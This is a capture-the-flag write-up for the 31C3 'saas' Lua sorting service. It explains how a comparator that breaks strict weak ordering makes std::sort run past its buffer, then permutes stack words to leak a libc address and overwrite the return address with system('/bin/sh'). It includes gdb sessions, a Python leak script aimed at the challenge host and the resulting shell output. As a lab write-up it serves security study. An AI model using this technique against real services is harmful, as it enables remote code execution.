saas was an exploitation challenge worth 50 points at the 31C3 CTF.

We solved it after the competition was already over.

We’re provided remote access to a number sorting service:

Welcome to SaaS (Sorting as a Service)!

Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 1
How many numbers do you want to sort(max 1024)?
: 4
Number 1: 6
Number 2: 3
Number 3: 2
Number 4: 5
Number 1 is now: 2
Number 2 is now: 3
Number 3 is now: 5
Number 4 is now: 6
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 7
Please insert your lua code, end with 3 empty lines:
function f(a, b)
    return a < b
end



How many numbers do you want to sort(max 1024)?
: 4
Number 1: 6
Number 2: 2
Number 3: 3
Number 4: 4
Number 1 is now: 2
Number 2 is now: 3
Number 3 is now: 4
Number 4 is now: 6
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 0
Goodbye

As you can see, we can choose either a predefined comparator function for the sort or we can provide our own Lua code to define it.

Initially we tried to reverse the binary, which was made a bit harder by the fact that binary was compiled as position dependent code but then linked as a position independent exeuctable, resulting in a relocatable binary where all external function calls are patched at runtime by the loader. Some reversing tools deal badly with this situation (See below).

We note the following:

  • NX and ASLR are enabled, the binary is fully position independent so its base address is also randomized.
  • The program creates a buffer of size 4 * 1025 and fills the first word with the magic value 0xdeadbeef.
  • Input numbers are written into that buffer after the magic value.
  • The call to std::sort is inlined, which makes the main function really long.
  • The predefined comparators are also implemented in Lua and can be found as strings in the binary.
  • Before executing any Lua code and before starting a sort, a call to alarm sets a timeout of 10 seconds, after which SIGALRM is raised. The alarm is cleared after the corresponding operation has finished. This is annoying for debugging.
  • For the actual sorting, the function comparator at offset 0x1fc0 is used. It basically calls the Lua function f to compare the two given numbers (see image below).

comparator

You will notice in the screenshot the weird calls with offset 1. This is because the disassembler sees only the unrelocated binary.

The first thing we want to do is get rid of the alarm, which is an easy exercise. We can just patch the binary and replace the first function argument 0xa with 0x0.

A not so useful bug

The program assumes that the function f has exactly two parameters. It first pushes the function object and then the arguments on the internal Lua stack. However, we can control the number of parameters, so we can in fact read and write beyond the stack by adding more parameters to f.

For debugging, we looked at the Lua source code to figure out the layout of the internal data structures. The global lua_State that also has a pointer to the top of the stack can be accessed under the symbol L. Let’s see:

gdb-peda$ break comparator(unsigned int, unsigned int)
Breakpoint 1 at 0x1fc0
gdb-peda$ run
Starting program: /home/niklas/ctf/31c3ctf/saas/saas/service
warning: Could not load shared library symbols for linux-gate.so.1.
Do you need "set solib-search-path" or "set sysroot"?
Welcome to SaaS (Sorting as a Service)!

Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 7
Please insert your lua code, end with 3 empty lines:
function f(a,b,c,d,e,f,g,h,i,j,k,l)
    l=31337
end



How many numbers do you want to sort(max 1024)?
: 2
Number 1: 1
Number 2: 2
Breakpoint 1, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ x/3wx L
// This is a lua_State struct
0x5655b0b0:	0x00000000	0x00000008	0x5655b228
gdb-peda$ x/20gf 0x5655b228
// This is the Lua stack, containing pointers and 64-bit float values
0x5655b228:	nan(0x7a5465655bb10)	nan(0x7a5465655bb10)
0x5655b238:	nan(0x7a5455655bb80)	nan(0x7a5445655b6d0)
0x5655b248:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b258:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b268:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b278:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b288:	nan(0x7a50000000000)
gdb-peda$ c
Continuing.
Breakpoint 1, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ c
Continuing.
Number 1 is now: 1
Number 2 is now: 2
Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: ^C
Program received signal SIGINT, Interrupt.
Stopped reason: SIGINT
0xf7fdabf0 in __kernel_vsyscall ()
gdb-peda$ x/13gf 0x5655b228
0x5655b228:	-3.6993765324808395e+269	2
0x5655b238:	1	nan(0x7a5005655b6d0)
0x5655b248:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b258:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b268:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b278:	nan(0x7a50000000000)	nan(0x7a50000000000)
0x5655b288:	31337

So we can in fact control the stack. With some experimentation we found out that we can have ~100 parameters. However, the stack has a size of only 40, so we can overflow it.

The bad news is that we did not find anything particularily interesting to overwrite. Maybe this bug is actually exploitable, but the conditions seem tough. We had one more idea though.

std::sort and undefined behaviour

Maybe a bit untuitively, the C++ standard places strict requirements onto the comparator function provided to std::sort and other standard library functions. Specifically, it is required that the comparator defines a strict weak ordering. Providing a comparator that does not fulfil these requirements leads to undefined behaviour, which basically means that “anything can happen”. In particular, the implementation is allowed to infinitely loop or crash or overflow memory in this case.

And indeed, modern implementations of the C++ standard library opt to save some bounds checking in favor of performance. An example of a comparator that is very likely to crash with a recent GCC compiler is the following:

#include <bits/stdc++.h>
using namespace std;

int main() {
    vector<int> x;
    for (int i = 0; i < 100; ++i)
        x.push_back(i);
    int i = 0;
    sort(begin(x), end(x), [&](int a, int b) {
        if (i++ < 1000) return true;
        return a < b;
    });
}

This sort actually overwrites the heap past the end of the allocated buffer, resulting in memory corruption. To understand why, we need to have a look at the implementation of std::sort in the standard library.

We notice several functions with the prefix __unguarded_. One of them is __unguarded_linear_insert. It underflows the buffer, which is not helpful to us because (a) all the interesting values lie after the buffer and (b) the comparator has a check that makes it exit immediately if one of the values is 0xdeadbeef, which is the value in front of the buffer…

Let’s dig deeper:

/// This is a helper function...
template<typename _RandomAccessIterator, typename _Compare>
  _RandomAccessIterator
  __unguarded_partition(_RandomAccessIterator __first,
                        _RandomAccessIterator __last,
                        _RandomAccessIterator __pivot, _Compare __comp)
  {
    while (true)
    {
      while (__comp(__first, __pivot))
        ++__first;  // OVERFLOW HERE!!
      --__last;
      while (__comp(__pivot, __last))
        --__last;
      if (!(__first < __last))
        return __first;
      std::iter_swap(__first, __last);
      ++__first;
    }
  }

/// This is a helper function...
template<typename _RandomAccessIterator, typename _Compare>
  inline _RandomAccessIterator
  __unguarded_partition_pivot(_RandomAccessIterator __first,
                              _RandomAccessIterator __last, _Compare __comp)
  {
    _RandomAccessIterator __mid = __first + (__last - __first) / 2;
    std::__move_median_to_first(__first, __first + 1, __mid, __last - 1,
                                __comp);
    return std::__unguarded_partition(__first + 1, __last, __first, __comp);
  }

  // ...

/// This is a helper function for the sort routine.
template<typename _RandomAccessIterator, typename _Size, typename _Compare>
  void
  __introsort_loop(_RandomAccessIterator __first,
                    _RandomAccessIterator __last,
                    _Size __depth_limit, _Compare __comp)
  {
    while (__last - __first > int(_S_threshold))
    {
      if (__depth_limit == 0)
        {
          std::__partial_sort(__first, __last, __last, __comp);
          return;
        }
      --__depth_limit;
      _RandomAccessIterator __cut =
        std::__unguarded_partition_pivot(__first, __last, __comp);
      std::__introsort_loop(__cut, __last, __depth_limit, __comp);
      __last = __cut;
    }
  }

This looks very promising. __introsort_loop is basically a quicksort with a fallback to heap sort in case a certain recursion depth is reached. It uses __unguarded_partition_pivot to partition the array.

If we watch closely, we control the return value of __unguarded_partition and thus __unguarded_partition_pivot! We can just make the comparator evaluate to true as often as we want, increasing the __first pointer beyond the end of the buffer. Because we then have __first > __last, the function returns __first immediately.

So what happens if we force __unguarded_partition_pivot to return an iterator past the end of the buffer? The recursion into the “right half” [cut, last) will do nothing because cut > last (it’s a signed comparison). Then the algorithm goes on to sort the “left half” [first, cut), which is bigger then the original buffer!

In summary: We are now able to sort not only our 1024 input numbers, but also a range that goes beyond this buffer. E.g. we could sort 2048 words, namely our input plus 1024 extra words that happen to lie on the stack). Since we control the comparator, we actually have a very powerful primitive: We can permute the values on the stack arbitrarily, starting from the beginning of our buffer. In particular, we can read and write arbitrarily on the stack.

We know that we can arbitrarily permute the stack, but we are to lazy to figure out the exact sequence of answers that we would need for the permutation we want. So we use a trick: We write our own little C++ program that calls std::sort with a custom comparator, and after an initial sequence of answers to extend the sort range, we just fall back to a standard “less-than” comparator and record its answers. std::sort will now just do its job and sort the extended buffer.

We lay out the numbers in a way such that the sort will have to perform a swap of the first and last element in the range, and leave the rest of the elements intact. Our input array will look like this:

{m, 1, 2, ..., m - 1, 0}

If within SaaS, we replay the exact answers that we recorded, it will happily repeat this exact permutation, regardless of the actual values in the array. The C++ program we created to record the answers will just output a sequence of answers that swaps the elements at offsets 0 and offset, when std::sort is called on a buffer of size n.

Infoleak + EIP control

We can now read an arbitrary value on the stack, we just need to pick one! A good candidate is the return address into __libc_start_main:

gdb-peda$ break main
Breakpoint 1 at 0x15a6
gdb-peda$ run
Starting program: /home/niklas/ctf/31c3ctf/saas/saas/service
Breakpoint 1, 0x565565a6 in main ()
gdb-peda$ backtrace
#0  0x565565a6 in main ()
#1  0xf7cc9e5e in __libc_start_main () from /usr/lib32/libc.so.6
#2  0x56556e88 in _start ()
gdb-peda$ break comparator(unsigned int, unsigned int)
Breakpoint 2 at 0x56556fc0
gdb-peda$ c
Continuing.
Welcome to SaaS (Sorting as a Service)!

Please choose your sorting algorithm:
0) exit
1) little endian, lower than
2) little endian, greater than
3) big endian, lower than
4) big endian, greater than
5) popcount, lower than
6) popcount, greater than
7) custom
: 1
How many numbers do you want to sort(max 1024)?
: 2
Number 1: 1
Number 2: 2
Breakpoint 2, 0x56556fc0 in comparator(unsigned int, unsigned int) ()
gdb-peda$ x/40wx $esp
0xffffc07c:	0x565573dd	0x00000002	0x00000001	0xffffc0c8
0xffffc08c:	0xffffc098	0xf7f5ce20	0xffffc114	0x00000002
0xffffc09c:	0x0000000a	0x565578d7	0x01eef476	0x00000000
0xffffc0ac:	0x46baeb00	0xf7f5ce60	0x565578d7	0xf7ed829b
0xffffc0bc:	0xffffc114	0xffffc10c	0x00000008	0xffffd128
0xffffc0cc:	0x56556dbd	0xffffc10c	0xffffc114	0x56556fc0
0xffffc0dc:	0x56556fc0	0x00000000	0x00000000	0x00000000
0xffffc0ec:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffc0fc:	0x00000000	0x00000000	0x00000002	0xdeadbeef
0xffffc10c:	0x00000001	0x00000002	0x00000000	0x00000000

So the input buffer landed at 0xffffc10c. Let’s see what’s 1024 words later:

gdb-peda$ x/12wx 0xffffc10c + 1024*4
0xffffd10c:	0x46baeb00	0xf7e66420	0xf7f57c14	0x565577db
0xffffd11c:	0xf7e66000	0x00000000	0x56556e57	0x00000000
0xffffd12c:	0xf7cc9e5e	0x00000001	0xffffd1c4	0xffffd1cc

Perfect, so the return address is the 8-th word after the buffer. Let’s write an exploit!

import sys, socket, time, os, re, telnetlib

def get_comparator(n, offset):
    return """
answers = %s
i = 0
function f(a,b)
    i = i + 1
    return answers[i]
end



""" % os.popen("./compute_answers %d %d" % (n, offset)).read().strip()

def wait_for(s):
    while True:
        p = sock.recv(4096)
        if s in p:
            break

def swap(offset, value):
    n = 1024
    values = [value] + list(xrange(1,n))
    sock.send("7\n" +
            get_comparator(n, n + offset) +
            "1024\n" +
            "\n".join(map(str,values)) + "\n")
    res = None
    while True:
        p = sock.recv(4096)
        m = re.search("Number 1 is now: (\d+)", p)
        if m:
            res = m.group(1)
        if "custom\n:" in p:
            break
    return int(res)

sock = socket.create_connection(("188.40.18.75", 1234))

wait_for("custom\n:")
libc_ret = swap(8, 0x41414141)
print "[*] leaked ret addr to libc_start_main =", hex(libc_ret)

And voila:

$ python2 leak.py
[*] leaked ret addr to libc_start_main = 0xf74aca83

The offset is different on my local machine because I have a different libc version installed.

Also, if we try this under a debugger, we get

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
gdb-peda$

So the swap worked and we control EIP.

The final Exploit

From here on it’s a simple exercise: We know the libc base and we can write arbitrary values onto the stack. Now we simply overwrite saved eip with the address of system and set the first argument to point to “/bin/sh” (also found inside libc).

The final exploit code reliably gives shell access and we are able to retrieve the flag

$ python2 exploit.py
[*] leaked libc base = 0xf74ce000
[*] overwriting return addr
[*] set first argument to /bin/sh
[*] Enjoy your shell ;)
cat /home/user/flag.txt
31C3_n0tExactlyStrictWEakOrd3r1ng